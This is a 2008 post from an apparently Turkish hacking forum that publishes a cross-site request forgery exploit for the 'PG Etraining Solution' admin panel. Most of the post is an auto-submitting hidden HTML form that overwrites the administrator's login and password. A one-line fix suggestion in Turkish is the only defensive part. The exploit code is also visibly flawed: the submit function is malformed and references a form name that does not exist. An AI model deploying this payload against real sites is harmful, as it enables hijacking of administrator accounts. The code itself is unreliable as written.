ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> PG Etraining Solution ~ XSRF Vuln.
PG Etraining Solution ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/n0x
Date :
21.12.2008 01:34:01
#
PG Etraining Solution ~ XSRF Vuln.
[Full Screen Display]
< ------------------- header data start ------------------- > ############################################################# # Application Name : PG Etraining Solution # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/n0x ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.n0x.submit();}</script> <form action=http://www.site.com/PATCH/admin/admin_settings.php method=post name=data> <input type=hidden name=sel value=1> <input type=hidden name=par value=change> <input type=hidden class=inpBox value=Administrator name=name maxlength=60 size=40> <input type=hidden class=inpBox value= name=surename maxlength=60 size=40> <input name=phone class=inpBox type=hidden value=011-111-1112 maxlength=60 size=40> <input name=email class=inpBox type=hidden value=add@dd.com maxlength=60 size=40> <input type=hidden class=inpBox value=London name=city maxlength=60 size=40> <select class=hidden name=countryid size=1><option label=Afghanistan value=1></option> <input type=hidden class=inpBox value=PG Etraining Solution name=company maxlength=40 size=40> <input type=hidden class=inpBox value=add name=login size=40> <input type=hidden class=inpBox name=password size=40 value=add> <input type=submit value=create name=B1> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©
